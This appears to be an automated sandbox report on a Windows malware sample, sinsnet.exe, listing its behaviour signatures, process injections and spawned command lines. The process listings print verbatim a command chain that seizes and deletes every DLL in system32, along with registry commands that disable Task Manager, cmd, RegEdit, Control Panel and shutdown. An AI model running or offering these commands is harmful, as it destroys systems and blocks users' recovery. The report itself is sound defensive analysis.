Malware Analysis Report

2024-11-16 12:57

Sample ID 240806-llawqswbln
Target sinsnet.exe
SHA256 233959352823b1e99961738ca7447ba106be4e17bc885b906c5997d5d2407d6f
Tags
discovery evasion exploit
score
8/10

Analysis Overview

Threat Level: Likely malicious

The file sinsnet.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion exploit

Possible privilege escalation attempt

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Disables cmd.exe use via registry modification

Checks computer location settings

Modifies file permissions

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 09:36

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 09:36

Reported

2024-08-06 09:39

Platform

win7-20240705-en

Max time kernel

147s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\System32\reg.exe | N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" | C:\Windows\System32\reg.exe | N/A

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\System32\mspaint.exe | N/A
(logged 51 times, once per mspaint.exe process)

Enumerates physical storage devices

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\reg.exe | N/A
(logged 6 times, once per reg.exe invocation)

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\mspaint.exe | N/A
(logged 64 times, all for mspaint.exe)

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2452 wrote to memory of 2604 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 2412 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2092 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2808 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\reg.exe
PID 2604 wrote to memory of 2320 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2452 wrote to memory of 2736 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2888 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\reg.exe
PID 2452 wrote to memory of 2784 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2760 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2500 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2932 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2948 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2840 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\notepad.exe
PID 2452 wrote to memory of 2908 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 1328 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\mspaint.exe
PID 2452 wrote to memory of 2024 | N/A | C:\Users\Admin\AppData\Local\Temp\sinsnet.exe | C:\Windows\System32\mspaint.exe
(each row above was logged three times, except the last one for PID 2024, which was logged once)

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

(launched 51 times with this command line, interleaved with the notepad.exe launches)

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

(launched 54 times with this command line)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

Network

N/A

Files

memory/2452-0-0x000000013FAB0000-0x000000013FC50000-memory.dmp

memory/2944-2-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2732-4-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2784-3-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2908-5-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2400-6-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1328-7-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2024-8-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1752-9-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

memory/1444-11-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2308-12-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1656-14-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2452-13-0x000000013FAB0000-0x000000013FC50000-memory.dmp

memory/2524-15-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1052-16-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1812-17-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2980-18-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1620-19-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2896-20-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1320-21-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1588-22-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1540-23-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/684-24-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1704-25-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3052-26-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2156-27-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1640-28-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1600-29-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2568-30-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2412-31-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1636-32-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2720-33-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2792-34-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2972-35-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1040-36-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2528-37-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2712-38-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3104-39-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3216-40-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3260-41-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3324-42-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3352-43-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3404-44-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3436-45-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3524-46-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3576-47-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3624-48-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3652-49-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3720-50-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3752-51-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3784-52-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3828-53-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3856-54-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2452-55-0x000000013FAB0000-0x000000013FC50000-memory.dmp

memory/2944-56-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2732-58-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2784-57-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2908-59-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2400-60-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1328-61-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2024-62-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1752-63-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1444-64-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2308-65-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1656-66-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2524-67-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1052-68-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1812-69-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2980-70-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1620-71-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2896-72-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1320-73-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1588-74-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1540-75-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/684-76-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/1704-77-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/3052-78-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

memory/2156-79-0x000007FEF6FE0000-0x000007FEF702C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 09:36

Reported

2024-08-06 09:37

Platform

win10v2004-20240802-en

Max time kernel

27s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion
No indicator row was captured for this signature in behavioral2; the matching command is the reg.exe add that sets DisableTaskMgr = 1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, listed under Processes below.

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A (36 identical rows collapsed)

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A (6 identical rows collapsed; they match the six reg.exe add commands listed under Processes)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A (64 identical rows collapsed)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A (64 identical rows collapsed)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
Each write below is reported twice in the original trace; the duplicate rows are collapsed.
PID 1020 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1020 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1020 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 712 wrote to memory of 1148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1020 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 416 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1020 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1020 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

